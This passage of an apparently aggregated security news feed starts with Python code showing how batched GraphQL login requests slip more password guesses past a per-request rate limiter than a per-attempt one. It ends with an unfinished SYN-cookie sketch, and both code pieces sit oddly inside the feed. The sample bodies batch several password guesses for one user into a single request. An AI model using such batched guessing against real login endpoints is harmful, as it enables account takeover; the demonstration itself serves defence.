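    def allow(self, key: str, raw_body: str) -> bool:
        if self.used[key] + 1 > self.max_attempts:
            return False
        self.used[key] += 1
        return True


class AttemptLimiter:
    """Attempt-aware limiter: charges one unit per credential check found in the body."""

    def __init__(self, max_attempts: int):
        self.max_attempts = max_attempts
        self.used = defaultdict(int)

    def allow(self, key: str, raw_body: str) -> bool:
        attempts = count_credential_attempts(raw_body)
        if self.used[key] + attempts > self.max_attempts:
            # Reject the whole request rather than letting a partial batch through.
            return False
        self.used[key] += attempts
        return True


def guesses_that_get_through(limiter, raw_body: str, requests: int) -> int:
    """Replay the same batched body `requests` times from one client key;
    return how many individual password guesses the limiter accepted."""
    per_body = count_credential_attempts(raw_body)
    accepted = 0
    for _ in range(requests):
        if limiter.allow("10.0.0.1", raw_body):
            accepted += per_body
    return accepted


# Constructed sample bodies (not taken from the post): three guesses per request.
BATCHED_ARRAY = json.dumps([
    {"query": 'mutation { login(user: "alice", pass: "p1") { token } }'},
    {"query": 'mutation { login(user: "alice", pass: "p2") { token } }'},
    {"query": 'mutation { login(user: "alice", pass: "p3") { token } }'},
])
ALIASED_QUERY = json.dumps({"query": (
    "mutation {\n"
    '  a1: login(user: "alice", pass: "p1") { token }\n'
    '  a2: login(user: "alice", pass: "p2") { token }\n'
    '  a3: login(user: "alice", pass: "p3") { token }\n'
    "}"
)})

if __name__ == "__main__":
    for name, body in (("array batch", BATCHED_ARRAY), ("alias batch", ALIASED_QUERY)):
        naive = guesses_that_get_through(RequestLimiter(5), body, requests=10)
        aware = guesses_that_get_through(AttemptLimiter(5), body, requests=10)
        print(f"{name}: per-request limit admits {naive} guesses, per-attempt limit admits {aware}")
```

With a limit of 5, the per-request limiter admits 15 guesses from ten replays of either body (five requests of three guesses each), while the attempt-aware limiter admits only the first request's 3. The same rule applies to any format that carries several operations in one envelope: count the operations, not the requests.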
  • Open

    Ukraine: situation update, 24 March
    The last 24 hours Continue reading on Medium »
    Open-source intelligence (OSINT): a way of obtaining data from the web
    What is open-source intelligence? Can a business owner or a company employee carry it out on their own? OSINT consists of collecting… Continue reading on Blog Transparent Data »
    OSINT Methodology and Tradecraft: Tips for Winning The Trace Labs Black Badge from Team Federal…
    INTRODUCTION Continue reading on Medium »
  • Open

    TrustedSec Okta Breach Recommendations
    TrustedSec’s Incident Response Team sent urgent communications to all IR retainer clients after the discovery of the compromise of Okta. Below are the recommendations provided with additional updates after reviewing more information on 03/23/2022. On March 22, 2022, the threat group LAPSUS$ announced a successful compromise of Okta, a heavily used identity and access management... The post TrustedSec Okta Breach Recommendations appeared first on TrustedSec.
  • Open

    Proxy: Accessing Network Connection
    No content preview
    The mystery of SQLMap’s --eval
    No content preview
    Authentication bypass using root array
    No content preview
  • Open

I've heard someone here might be interested in virus (ransomware) samples. I'd like to know what this is or what to do about it.
    submitted by /u/TarnaBar [link] [comments]
    Large-scale npm attack targets Azure developers with malicious packages
    submitted by /u/SRMish3 [link] [comments]
    GitHub - Developers Support Ukraine
    submitted by /u/ssh-mitm [link] [comments]
    LTrack: Stealthy Tracking of Mobile Phones in LTE
    submitted by /u/rbarkley [link] [comments]
    Microsoft: DEV-0537 (LAPSUS$) criminal actor targeting organizations for data exfiltration and destruction
    submitted by /u/momothereal [link] [comments]
  • Open

    A Detailed Guide on Crunch
Introduction Oftentimes attackers need to generate a wordlist based on certain criteria required for pentest scenarios like password spraying/brute-forcing. Other The post A Detailed Guide on Crunch appeared first on Hacking Articles.
  • Open

    What if…
    … Your IdP is breached Continue reading on Neuvik »
  • Open

    SecWiki News 2022-03-23 Review
Windows driver signing: lessons learned by yunshanwuyin; A first look at shellcode AV evasion by yunshanwuyin; For more of the latest articles, visit SecWiki
  • Open

Multiple ways to find SQL and cheatsheet
    Comments out rest of the query.  Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing… Continue reading on Medium »
    Information Disclosure Bug
    Web security Continue reading on Medium »
    How I Was Able To TakeOver Any Account On One Of Europe's Largest Media Companies
    Welcome back, I have not produced a writeup in over a week due to hunting for further vulnerabilities on Hall Of Fame sites, many of which… Continue reading on Medium »
    My Pentest Log -11- (CSRF in ASP)
    Greetings everyone from the Basilica, Continue reading on Medium »
    Zenlink Partners with Immunefi and Launches Bug Bounty
    March 23, 2022 — We are pleased to announce that Zenlink has partnered with Immunefi and launched a bug bounty program. Continue reading on Zenlink Foundation Ltd. »
    Supply Chain Attacks: A ripe area for research
    Let’s discuss about Supply Chain Attacks and why it’s a great research area in the recent times. Continue reading on Pentester Academy Blog »
    No Rate Limit at Reset Password Endpoint can Lead to account takeover (APPLE CORP)
    In The First This is my first writeup so forgive for anything or any mistake or you can send to me to share your knowledge or increase… Continue reading on Medium »
  • Open

    Bypassing domain deny_list rule in Smokescreen via trailing dot leads to SSRF
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1410214 - Bounty: $1500
    XSS Reflected at https://sketch.pixiv.net/ Via `next_url`
    pixiv disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1503601 - Bounty: $500
  • Open

    Operation Dragon Castling: APT group targeting betting companies - Avast Threat Labs
    submitted by /u/dmchell [link] [comments]
  • Open

    Another Vulnerability in the LPC55S69 ROM
    Article URL: https://oxide.computer/blog/another-vulnerability-in-the-lpc55s69-rom Comments URL: https://news.ycombinator.com/item?id=30778778 Points: 137 # Comments: 46
  • Open

Dell discloses five major vulnerabilities affecting millions of Inspiron, Vostro, XPS and Alienware systems
Dell BIOS contains five new security vulnerabilities which, if exploited by attackers, could lead to code execution on vulnerable systems.
FreeBuf Morning Report | Hackers leak 37GB of Microsoft source code; White House shares checklist for responding to Russian cyberattacks
A hacker group leaked 37GB of Microsoft source code related to hundreds of projects, including Bing and Cortana.
Tophant (斗象科技) CEO Xie Chen: the Chinese and US cybersecurity markets are clearly diverging, a "parallel universe" is emerging
A distinct "Chinese cybersecurity universe", parallel to the one overseas, has already emerged.
NFC has high-severity vulnerabilities too? See how he analyzes one (CVE-2021-0870)
NFC plays an important role in people's daily lives and has become an indispensable component of mobile devices. Like Bluetooth, NFC uses radio-frequency technology to communicate between devices, so both the chip firmware and the host NFC subsystem are targets for remote code execution (RCE) attacks.
"DRP Digital Risk Protection 2021 Annual Report" released
Correctly addressing the risks of digital transformation lets enterprises make full use of digital transformation technology and truly reap its benefits.
Okta investigating data breach and extortion by the Lapsus$ group
Okta, a leading provider of authentication services and identity and access management (IAM) solutions, recently said it is investigating a data breach involving extortion.
ELTA hit by ransomware attack, Greek public postal service offline
Greek state-owned postal service provider ELTA was hit by a ransomware attack that took most of its services offline.
Microsoft confirms breach by the Lapsus$ extortion group
Microsoft has confirmed that one of its employees was compromised by the Lapsus$ hacking group, allowing the attackers to access and steal part of its source code.
Nestlé attacked by Anonymous, 10GB of sensitive data leaked
Recently, the international hacker collective Anonymous announced that it had successfully attacked Nestlé.
Indiscriminate kills: I've seen your secret keys
The more knowledge, the better.
Revealed! The "PR" tricks of female streamers and male operators
In recent years the live-streaming economy has grown rapidly, producing a large crop of internet-celebrity streamers.
Baihang Credit Co., Ltd. is hiring for a security management position
Hiring security management staff (junior to mid-level); directly under the central bank, six insurances and two housing funds, talent housing, two meals included.
SaaS-to-SaaS connections may become a major cybersecurity threat
The biggest challenge to solve at present is the lack of visibility into user activity and data, followed by knowing all the SaaS applications in use and managing them centrally.
  • Open

    Anatomy of a Ghost CVE
    Article URL: https://daniel.haxx.se/blog/2022/03/23/anatomy-of-a-ghost-cve/ Comments URL: https://news.ycombinator.com/item?id=30776755 Points: 16 # Comments: 0
  • Open

    Random Stuff (Mac SW, Wallpapers, Images)
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

An in-depth look at reflective DLL injection
Author: Sangfor Qianlimu Security Lab. Original link: https://mp.weixin.qq.com/s/kVpesy_w7XLanL_WhRhn-Q 1. Introduction: DLL injection is a technique that makes a process load a specified DLL. To improve stealth, malware commonly uses DLL injection to inject its own malicious code, in the form of a DLL, into highly trusted processes. Conventional DLL injection uses the LoadLibraryA() function to make the injected process load the specified DLL. Conventional D...
Storm Cloud hackers stir up a storm: GIMMICK malware strikes at macOS
Translator: Knownsec 404 Lab translation team. Original link: https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ In late 2021, Volexity discovered an intrusion in an environment covered by its network security monitoring service. Volexity detected a system running frp, also known as fast re...
  • Open

    road map
To the kind people: can someone please create a computer forensics road map for beginners, mentioning the OS types, the tools, and the resources to learn from and find practice material? submitted by /u/ItchyPilot9804 [link] [comments]
    Portscanning and malware in Encase8
Hello all! I was hoping to see if anyone could help me with a school project I'm working on that has me a bit lost in the woods. We just learned about portscanning and malware in class, but unlike many of our other classes we did not do a lab to help us understand the process required to gather the information. The assignment gave us two forensically imaged drives: one was the source of the alleged attack (a student) and the 'victim' was another (the teacher). I have my suspicions (based on the class) that the scan was not malicious but the product of a malware attack through open ports, but that's what I want to find out! I just started using EnCase 8 (moved from EnCase 6), so my proficiency is abysmal currently with the new UI. For those who have experience out there, what should I be looking at first? Programs to use that may be better than EnCase (and free)? My gut says to try and find programs of execution and build a timeline. What should I be looking at? svchost.exe? AppData? ShimCache? (Probably all of these, but to be honest I don't know what I'm looking for because I don't know where to start.) What does evidence of portscanning 'look' like? submitted by /u/SkitzTheFritz [link] [comments]

  • Open

    Hacking, Spyware & The Internet of Things
    In September 2021, my iPhone was remotely wiped after glitching for a few weeks. The phone was given to me by my ex who I currently have an order of protection against arising from a domestic violence incident in March of 2020. He always knew things he shouldn’t have but I thought he was physically going through my phone but realized after this happened that a few instances would have required remote access. My order of protection expires in less than 2 weeks and I need help. He is not technologically savvy but owns several companies with internal IT Departments and has the financial resources to do most of what is possible in the world of tech stalking and hacking. Within 2 days of my phone being wiped, every one of my accounts was hacked (except my gmail that had my Mother’s phone numb…
    Anyone know how to add a new root certificate into the 'Brave' browser?
    I need to MitM myself for a personal project. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]
    Would you / Do you use a virtualized firewall on the Cloud? What are the benefits?
Some vendors offer firewall solutions for the cloud (mostly PA with VM-Series, CheckPoint with Quantum and Fortinet with FortiGate afaik). These are pretty much the same software/firmware they have on physical firewalls, but they virtualize it and put it on cloud instances, then you configure your traffic to go through them. Do you use any of these solutions? If yes, why? Do you like them? I want to understand more about their benefits and downsides. What I can see as benefits are: More visibility (L7) and control over the CSP's native firewall; Integrated threat intelligence and other AI/ML features; Other bonus features (DNS security, for example). And downsides would be: Additional cost when you already have your CSP firewall for "free"; Single point of failure, hard to set up and maintain (I think?); Same security benefits can be achieved using more cloud-native tooling (I think?). What do you think? Do you or would you use one of those? Personally I think the downsides outweigh the benefits, but I would love to hear differing opinions. submitted by /u/lacioffi [link] [comments]
    I'm going to be going to hospital for a little while; I was planning to use RealVNC on my phone to use my home office while there. I'm assuming this will be okay to use for 2-3 weeks then i can uninstall it all?
    I don't know too much; forgive my ignorance. I've never had to do any remote-ing outside of my home office but I cannot avoid the surgery of course. submitted by /u/Buttercup59129 [link] [comments]
Need advice about my career
Hi; I have basic knowledge of programming but I can understand code to a certain level. And I play CTF challenges, and I can say that I am a beginner but I have a good understanding of the flaws, except I still struggle in exploiting some vulnerabilities. But in the matter of knowing what is happening I can tell a lot and identify vulnerabilities, but I can't exploit all of them. I really need advice or a suggestion about what I can do with my actual knowledge, and if I can use it to find a job according to my current level, or if I need to improve my skills more to find a job. (I really need a job asap) submitted by /u/xmrchaos [link] [comments]
    What features would make my ISO 27002 Explorer even better?
    I've created the ISO 27002 Explorer for information security professionals. You can use it to search through the ISO 27002 security controls and filter on different attributes. 👉️ What features should I add to make it even more useful? I already got the following suggestions on my original post: display the 2013 version controls a 2022 version control may replace –🙏🏻 u/dogpupkus, trying to add this by tomorrow; a button to remove filters – also u/dogpupkus – don't think that's possible on the #nocode platform I'm using; add the full control text – can't do that bc of copyright, though I'm thinking of adding translations, see this thread for an example; would I like a beer/coffee or something? 🍻 u/RHvdW very nice of you, you can help me by engaging with @iso27diy Have fun and let me know what you think! submitted by /u/But-I-Am-a-Robot [link] [comments]
    How does response manipulation via a mitm proxy like burp lead to bugs?
https://ashutoshmishra00x0.medium.com/account-takeover-via-response-manipulation-worth-1800-ffb242cc55c9 Take this for example: it leads to an OTP bypass and account takeover by setting success false to success true. Considering the response is just for the client to see, how does this affect the server at all? Is the server sometimes programmed to poll specific endpoint responses and serve a page based on that? If so, is there any interesting way to simulate this behavior in a local environment, as maybe a capture the flag? I wanna see why and how it works so I can continue to find more of them in the wild; it just never made sense to me. Like, requests are obvious: the server parses the input and does transformations, sometimes reflects it, etc. But responses, I have no clue why spoofing responses would work. submitted by /u/Academic-Discount252 [link] [comments]
    Self-taught outside of the US
Last time I asked you if it was possible to work in cyber security without being an ex-engineer, I got so many useful replies (thank you again!!) but I forgot to mention that I live in Europe (France). So now I'm once again losing hope because I don't know if everything I'm learning will ever grant me a job. Here having a degree is mandatory, so I'm stuck. Do you know of people hired in the US coming from outside? Are people still getting visa sponsorships or did that become exceptional? And finally, what do you think of the IT industry in Canada? Thanks again for helping me; I'm by myself on this path so your advice is very valuable. submitted by /u/No-Lead497 [link] [comments]
  • Open

    Ricochet reborn: We are building a user friendly TORChat (Ricochet) for GNU/Linux, MacOS and Windows
    submitted by /u/SpeekSecure [link] [comments]
    [CFP] Call for paper/tools/workshop for THREAT CON 2022 is now live
    submitted by /u/nyoface [link] [comments]
    OpenSSH phishing FIDO token protected keys (PoC)
    submitted by /u/ssh-mitm [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 1 - Discover components and ports
    submitted by /u/0xdea [link] [comments]
    Multiple Vulnerabilities in GARO Wallbox
    submitted by /u/eddit__plus [link] [comments]
    RomHack 2022 CFP is Open!
    submitted by /u/smaury [link] [comments]
  • Open

    Playing with test fuzzing in Go
    Go 1.18 recently introduced test fuzzing, so I decided to give it a go (no no, I’m not making a stupid joke). Continue reading on Medium »
  • Open

    Incorrect Authorization Checks in /include/findusers.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081137
    Arbitrary File Deletion via Path Traversal in image-edit.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081878
    Potential Authentication Bypass through "autologin" feature
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081986
    Regexes with large repetitions on empty sub-expressions take a very long time to parse
    Internet Bug Bounty disclosed a bug submitted by addisoncrump: https://hackerone.com/reports/1518036 - Bounty: $4000
    The endpoint '/test/webhooks' is vulnerable to DNS Rebinding
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1379656 - Bounty: $100
    Race condition on action: Invite members to a team
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1285538 - Bounty: $100
    The endpoint /api/internal/graphql/requestAuthEmail on Khanacademy.or is vulnerable to Race Condition Attack.
    Khan Academy disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1293377
    Web Cache poisoning attack leads to User information Disclosure and more
    Lyst disclosed a bug submitted by deksterh1: https://hackerone.com/reports/631589 - Bounty: $300
    [https:///]&&[https:///] Open Redirection
    Lyst disclosed a bug submitted by mandark: https://hackerone.com/reports/537047 - Bounty: $300
    html injection via invite members can be leads account takeover
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1443567 - Bounty: $150
  • Open

    DEV-0537 criminal actor targeting organizations for data exfiltration and destruction - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    OffSecOps: Using Jenkins For Red Team Tooling
    submitted by /u/dmchell [link] [comments]
  • Open

    Secularism vs Individual Rights in Karnataka + Cost of Living in Spain + More
    On this 5th edition of the discursus Protest Analytics newsletter — March 22, 2022 Continue reading on discursus.io »
Ukraine — Situation update as of 23 March
The last 24 hours Continue reading on Medium »
  • Open

    Taco Bell Born X Raised Shirt
    Buy : https://teespring.com/en-GB/taco-bell-born-x-raised-shirt Continue reading on Medium »
  • Open

A case of unauthorized use of a Google Maps API key
Hey folks, Continue reading on Medium »
    The mystery of SQLMap’s --eval
    Master the power of exploiting most complex SQL injections Continue reading on InfoSec Write-ups »
    Stumbling into the bug of another
    The work of another bug hunter is staring back at you. Is your job half done? Continue reading on Medium »
  • Open

    Lsass.exe spawning werfault.exe
Hi folks, today I found suspicious behaviour on two DCs inside the network, where lsass.exe spawned the process werfault.exe. While investigating I was not able to get any artifact that indicates the servers might be compromised. I detected this on the SIEM, and the EDR logs don't mention the process lineage. Can you people help me? submitted by /u/i_whiteheart [link] [comments]
    Autopsy for Network forensic analysis
As far as I know, tools like Wireshark and Burp Suite are the go-to applications for network forensics. But when I am playing with Autopsy I found out that it can get browser activities and cookie info. So are there more options to analyze network-related activities through Autopsy, or any plugins that can be used for this purpose? Edit: This might not make sense probably, and I have not found any articles related to the above online. I am just curious and would love to know if it's an option. submitted by /u/madladmary [link] [comments]
    Presentation topics
    I am an IR professional and I am doing a presentation to Digital Forensics students in a couple of months. Any recommendations for topics I should touch on? Any DF students out there have any suggestions on what they would like to hear from an IR person? submitted by /u/Digital_forensicator [link] [comments]
    GCIH or GCFA?
I am looking to get my first GIAC cert and it's between these two. I already have two years of cybersec experience as an analyst and have the A+, Sec+ and CySA+ under my belt. I want to move on to something a little more challenging. I'd love to take a jab at GCFA but I am afraid it's wayyyyy too advanced for me. How likely are you to recommend someone jump into this? Or would you recommend me going after a different cert before this? I am trying to sharpen my IR skills. submitted by /u/Enes_24 [link] [comments]
  • Open

    SecWiki News 2022-03-22 Review
SecWiki Weekly (Issue 420) by ourren; For more of the latest articles, visit SecWiki
  • Open

    Top 4 Books to learn Web Browser Security in 2022
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    OpenSSL BN_mod_sqrt() exploit published (CVE-2022-0778)
    Article URL: https://github.com/drago-96/CVE-2022-0778 Comments URL: https://news.ycombinator.com/item?id=30765727 Points: 1 # Comments: 0
  • Open

Thoughts on how to better demonstrate the value of red-blue team exercises
Although I have already shared my experience and thinking on red-blue exercise mechanisms and blue team building many times through different channels (blog, WeChat public account, public talks, etc.), today … Continue reading Thoughts on how to better demonstrate the value of red-blue team exercises →
  • Open

    TryHackMe writeup: Alfred
    Here, I will use Jenkins as a vector to gain initial access to a target system and then use token impersonation for privilege escalation. Continue reading on InfoSec Write-ups »
    OTP Bypass and Account Takeover at Hospital
    No content preview
    How I created an undetectable Backdoor for Windows — Ethical Hacking
    No content preview
    Baron Samedit CVE-2021–3156 [TryHackMe]
    No content preview
  • Open

FreeBuf Morning Report | LAPSUS$ breaches Microsoft DevOps account; dental care data breach may affect one million people
The LAPSUS$ group breached a Microsoft DevOps account and claims to have access to some of Microsoft's DevOps resources.
"CryptoRom" scam targets mobile users
Criminals lure victims into stock investments, gambling and similar schemes in order to defraud them, a practice known as "pig butchering" (杀猪盘).
Hacker discloses source code of new Conti ransomware version on Twitter
Recently, a hacker publicly disclosed the source code of a new version of the Conti ransomware on Twitter.
Russia-linked InvisiMole group launches spear-phishing attacks against Ukraine
Ukraine's Computer Emergency Response Team (CERT-UA) says the UAC-0035 group launched spear-phishing email attacks against Ukrainian state agencies.
Italy's data privacy regulator opens investigation into Kaspersky
Authorities are verifying how the Russian security company handles the data of Italian users, and whether collected information is transferred to regions outside the EU.
Giant killer: Lapsus$ extortion group claims to have breached Microsoft source code repositories
In just a few months, the Lapsus$ extortion group has successfully breached NVIDIA, Samsung, Ubisoft, Mercado Libre, Vodafone and other well-known companies.
Analysis of the "1337" cryptomining group's activity
1. Overview: In early February 2022, the HIT-Antiy joint C
  • Open

Exploring JVM shellcode injection
Author: p1ay2win@Tianxuan Security Lab. Original link: https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A Preface: With the development of RASP technology, ordinary webshells have little room left to operate, and even the various in-memory webshells are gradually being stretched thin. Following the "go lower" line of thinking from "JSP Webshell Matters: Attack Part (1)", is there a way to execute machine code from Java code? The answer is yes; the common inj...
Serpent, no swiping! New backdoor targets French entities
Translator: Knownsec 404 Lab translation team. Original link: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain Key findings: Proofpoint identified a targeted attack in which the attackers used the open-source package installer Cho...

  • Open

    MRI pictures
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    A lot of anime, movies and shows
    https://setnomanime.me/0:/ submitted by /u/Isolatedleliel [link] [comments]
    Very Large OD full of software
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    What are the Best Security Testing Tools (Open Source)?
Seeking a reliable security testing tool can be overwhelming, given how large the opsec environment has grown over the last few years. Given how large things have grown, it has become common to overcharge people in the industry for security services provided. Because of this, it is very beneficial for any small business or organization on a budget to consider the free and open-source software available. There are many free and open-source security testing tools out there, but the best places to look are GitHub, reliable search engines, and the infosec/opsec sphere of blogs and forums. Continue reading What are the Best Security Testing Tools (Open Source)? at Sucuri Blog.
  • Open

    Blue Team Junior Analyst Review
    Entry level blue team training courses from Security Blue Team Continue reading on Medium »
Ukraine — Situation update as of 22 March
The last 24 hours Continue reading on Medium »
  • Open

Gathering Information About a Target System or Systems
Hello friends, in this article I will talk to you about the information-gathering phase for a target or targets and about information-gathering tools… Continue reading on Medium »
    Active Directory Certificate Services: Domain Dominance
    When I’m taking part in a penetration test or red team engagement, I love digging down into the intricacies of Active Directory… Continue reading on Medium »
  • Open

    what are the resources or references pentesters use to find exploits on known vulnerabilities?
    Thanks in advance, after doing a vuln scan and detecting new vulns, what do you do next to get the resources or information needed to exploit the vulnerability? submitted by /u/rleekc [link] [comments]
    Managed Security Services Recommendation
    Does anyone have any recommendations for some reputable MSSPs? We have looked at Trustwave and SecureWorks so far. Trustwave can manage our firewalls for us, but they lack endpoint security, whereas SecureWorks does endpoint security, but they do not manage firewalls. I am really looking for a company that will manage Palo Alto firewalls as well as do endpoint security. submitted by /u/Thavus [link] [comments]
    Intel lists for Cracked Software / Warez domains?
Hey all, I had an idea about proactively ingesting lists of domains which are for cracked software / warez to block them in my proxy. While I could scrape search engines looking for sites, it would be easier if there was an intel list I could pull from daily that is already managed and kept up to date. Does anyone here know of such a list, or any better way to gather this data? Thanks submitted by /u/truedoom [link] [comments]
    AAA
    Hello everybody! I am new to the AAA server (ISE) and I would be thankful if you can suggest some videos that can explain it clearly for me as a beginner! Thank you. submitted by /u/Murky_Fee5417 [link] [comments]
    Best throwaway email service?
I'm looking for an email service that allows you to create an email address and use it for either sending emails briefly, creating an account that won't last long, or so on. I swear ProtonMail used to have a feature where email addresses could self-destruct after a pre-determined amount of time, but I am not seeing this feature today. Can anyone recommend a good service that works like the above? submitted by /u/JamieOvechkin [link] [comments]
  • Open

    Unconstrained Delegation
    submitted by /u/netbiosX [link] [comments]
    Shielder - Reversing embedded device bootloader (U-Boot) - p.2
    submitted by /u/smaury [link] [comments]
    CVE-2022-0811 : New Vulnerability in CRI-O Engine Lets Attackers Escape Kubernetes Containers
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Initial access via rtlo attack
    submitted by /u/exandroiddev [link] [comments]
  • Open

    Unconstrained Delegation
To support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system, Microsoft implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
  • Open

    Log4j Java RCE in [beta.dev.adobeconnect.com]
    Adobe disclosed a bug submitted by sheikhrishad0: https://hackerone.com/reports/1442644
    Arbitrary file read via the bulk imports UploadsPipeline
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1439593 - Bounty: $29000
    Get all personal email IDs of Glassdoor users[No user interaction required]
    Glassdoor disclosed a bug submitted by safehacker_2715: https://hackerone.com/reports/864783 - Bounty: $1500
  • Open

    SecWiki News 2022-03-21 Review
Fifty years of ups and downs: the evolution of malware by Avenger; Some lessons from writing an information security plan by ourren; For more of the latest articles, visit SecWiki
  • Open

OSINT — The Spy
    No content preview
    TryHackMe: Chocolate Factory Write-up
    No content preview
    What is Distributed Tracing and How does it work?
    No content preview
  • Open

    Log Sources for Digital Forensics: Windows and Linux
    submitted by /u/ogunal00 [link] [comments]
    APT35 Automates Initial Access Using ProxyShell
    submitted by /u/TheDFIRReport [link] [comments]
  • Open

FreeBuf Morning Report | UK NFT scams surged 400% in 2021; South Korean hacker group attacks Macau hotels
The FBI released a joint cybersecurity advisory warning of AvosLocker ransomware attacks targeting multiple US critical infrastructure sectors.
  • Open

    Western Digital EdgeRover App: Elevated Privileges Windows, macOS CVE-2022-22998
    Article URL: https://www.bleepingcomputer.com/news/security/western-digital-app-bug-gives-elevated-privileges-in-windows-macos/ Comments URL: https://news.ycombinator.com/item?id=30749920 Points: 2 # Comments: 0
  • Open

In-depth analysis of the new reflection attack based on the tp240dvr service
Author: Baidu Security Lab. Original link: https://mp.weixin.qq.com/s/YCu8e6qkrq_3AxhVRd5ygQ 0x00 Overview: In February 2022 Cloudflare first disclosed a new reflection/amplification attack in which attackers abuse the tp240dvr (TP-240 driver) service, with an amplification factor of over 4 billion; several security teams at home and abroad have since published analyses of this type of attack. After noticing these attacks, Baidu Zhiyundun conducted an in-depth analysis, and we confirmed...

  • Open

    Pages banned by other pages is still able to take action on event(comment+post)
    Vuln Type Privacy / Authorization Continue reading on Medium »
Wombat Exchange bug bounty program officially launched
Win bounties of up to US$100,000! Continue reading on Wombat Exchange »
    Insecure Direct Object Reference
    Let us learn about IDOR Continue reading on Medium »
    What Is A Bug Bounty Program?
    Companies spend a part of their budget in different areas such as marketing to improve their position and people’s opinion, but there is… Continue reading on Medium »
    ultimate and advance way to find xss!
    What is XSS? Continue reading on Medium »
    fstScan — Massive Vulnerability scanner.
fstScan is the fastest tool to scan an entire website. Continue reading on Medium »
    Launching Wombat Exchange Bug Bounty Program
    Get up to US$100,00 in Rewards! Continue reading on Medium »
    A Study of Double-Write Bypass for SQLMap — Tamper
    Introduction Continue reading on Medium »
    Broken session control leads to access private videos using the shared link even after revoking the…
    A lot of people might know how to share the private video and can access that video but here the interesting thing is now this… Continue reading on Medium »
    Top Ethical Hacking Tools and Software for 2022
    A detail blog on Top hacking tool which is used by skill hackers ! Continue reading on InfoSec Write-ups »
  • Open

    Linux EDR testing: simple to extend but realistic initial access test case and ideas where to focus when testing
    submitted by /u/4lreadytekken
    GitHub - fgsect/FitM: FitM, the Fuzzer in the Middle, can fuzz client and server binaries at the same time using userspace snapshot-fuzzing and network emulation. It's fast and comparably easy to set up.
    submitted by /u/domenukk
    Xepor: the web routing framework, brings the best of mitmproxy & Flask
    submitted by /u/ttimasdf

    Testing EDRs for Linux — Things I wish I knew before getting started
    Thoughts on how to simplify your tests while keeping it real, and a realistic, easy to expand initial access case.
    LOLBINed — 360TotalSecurity (360AdvToolExecutor.exe)
    Very Total, Much Security

    Ukraine — Situation update as of 21 March
    The last 24 hours
    Recon-ng: Powerful Reconnaissance Tool
    A Sneak Peek into the Forbidden State: Exploring the CyberSpace of North Korea
    [0x0] The Beginning
    THE ART OF SOCK PUPPET
    A sock puppet is an alternative online identity or, in simple words, a fake account
    OSINTGRAM : Gather Instagram Target Information (Step-by-Step Guide)
    In this guide I will be showing you how to install and use the functions of Osintgram in Kali Linux.
    US defense budget allocation for language interpretation
    https://www.youtube.com/watch?v=sr54QBU2lBc

    Fully understand SYN Flood (TCP backlog and other stuff)
    Hey, I have multiple questions about the subject:
    1. I do know what port states are (like LISTEN, SYN_RECEIVED, ESTABLISHED, etc.), but I don't understand exactly how the TCB queue works with them. Does the kernel open a new TCB every time the port state needs to be changed, or something else?
    2. If so, does it necessarily need to be a SYN attack? It can also be an "ACK" attack or an attack on any other state. I think the only advantage is that SYN is faster to send in massive traffic.
    3. I didn't understand whether today's well-known OSes like Red Hat Linux, Windows Server, Windows Home, etc. limit the backlog by default or not. I saw different sources say different things. Do organizations usually limit the TCP backlog manually (I know it depends), or just trust third-party systems like F5's BIG-IP?
    4. Is IP and port spoofing necessary for the attack? Won't the victim's OS create a new TCB if I don't change my socket?
    5. If question 2 is right, do third-party solutions also implement the same SYN cookie method for any other possible state?
    Thanks! submitted by /u/Webly99
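
    The mechanism the question above circles around, SYN cookies, is the standard answer to "does the server have to allocate a TCB per SYN": it does not, if its own initial sequence number is itself a keyed proof that the SYN was seen. The block below is an added, simplified illustration of that idea, not code from the post or from any kernel (Linux packs the fields differently and rotates its secret): the server folds an HMAC over the 4-tuple, the client's ISN and a coarse time counter into the low 24 bits of the SYN-ACK sequence number, puts the counter in the top 8 bits and an MSS table index in the low 2 bits, and when the third-handshake ACK arrives it recomputes the cookie instead of looking anything up. The secret, addresses and counter values are constructed for the example.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional

# Constructed secret for the example; a real stack keeps this in the kernel and rotates it.
SECRET = b"constructed-demo-secret"
COOKIE_BITS = 24                      # low 24 bits of our ISN carry the keyed hash + MSS index
COUNTER_WINDOW = 2                    # accept cookies whose counter is at most this many ticks old
MSS_TABLE = (536, 1300, 1440, 1460)   # the 2-bit MSS index selects one of these
MASK32 = 0xFFFFFFFF


@dataclass(frozen=True)
class FourTuple:
    saddr: str
    sport: int
    daddr: str
    dport: int


def _keyed_hash(t: FourTuple, client_isn: int, counter: int) -> int:
    """HMAC over everything the server can recover again from the client's final ACK."""
    msg = f"{t.saddr}:{t.sport}->{t.daddr}:{t.dport}|{client_isn}|{counter & 0xFF}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")


def make_syn_cookie(t: FourTuple, client_isn: int, mss: int, counter: int) -> int:
    """ISN the server sends in its SYN-ACK instead of allocating a TCB.

    Layout (32 bits): [counter mod 256 : 8][keyed hash : 22][MSS index : 2]
    """
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
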